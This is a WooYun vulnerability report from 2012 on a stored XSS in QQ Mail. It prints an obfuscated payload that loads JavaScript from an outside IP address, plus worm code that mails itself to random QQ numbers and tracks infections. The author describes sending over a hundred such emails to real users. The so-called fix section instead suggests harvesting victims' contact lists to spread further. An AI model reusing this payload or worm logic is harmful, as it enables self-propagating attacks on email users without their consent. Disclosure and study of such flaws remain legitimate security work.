当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08158

漏洞标题:QQ邮箱另一存储型XSS

相关厂商:腾讯

漏洞作者: shine

提交时间:2012-06-11 09:23

修复时间:2012-07-26 09:24

公开时间:2012-07-26 09:24

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-11: 细节已通知厂商并且等待厂商处理中
2012-06-11: 厂商已经确认,细节仅向厂商公开
2012-06-21: 细节向核心白帽子及相关领域专家公开
2012-07-01: 细节向普通白帽子公开
2012-07-11: 细节向实习白帽子公开
2012-07-26: 细节向公众公开

简要描述:

主要是对上一个正文的XSS利用详细说明补充一下!

详细说明:

以下所有测试环境;
操作系统:WinXP
浏览器:IE6
qq记事本存储型XSS,如图:


处于非编辑器状态也弹了,如图:


漏洞证明:


补充说明上一个XSS: WooYun: QQ邮箱正文存储型XSS!
由于处于编辑状态,利用起来就很方便:
首先在超链接处填充代码加载外部js文件:

<img/src='http://rescdn.qqmail.com/zh_CN/htmledition/images/logo/logo_0_00aa5cc.gif'><img/src='javascript:{var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,50,50,51,46,52,46,56,46,49,57,48,47,106,115,47,120,115,115,46,106,115);document.body.appendChild(s);}'>http://www.qq.com/送爱心签名传递/<您的签名位置><卢丽丽><李云山>


外部链接代码:

var qqMail;
for(m=1;m<=8;m++){//随机填充8个收件人qq邮箱号码
qqMail=("0000000" + 100000000 * Math.random()).match(/(\d{8})(\.|$)/)[1];
if(qqMail.substr(0,1)!='0'){//正则没写好,qq号码是没有“0”开头的
QMAddrInput.get('to',window).add(qqMail);
}
}
document.getElementById('sendbtn').click();//调用“发送”按钮点击事件,发送
//ps:第8个是我的qq号码,用来做感染用户统计的,在这里改了一下代码!


如图:


就有传播途径了(代码粗糙了点,但可以说明问题了)!
测试发送一百多份邮件,只有一个人点击触发,限制因素太多,不给力啊!

修复方案:


使用获取的当前用户“联系人”列表邮箱号码作为发送号码或使用qq群邮件发送,命中率更高!

版权声明:转载请注明来源 shine@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-06-11 11:11

厂商回复:

thanks,多谢反馈此问题,经过评估这种风险较低。

最新状态:

暂无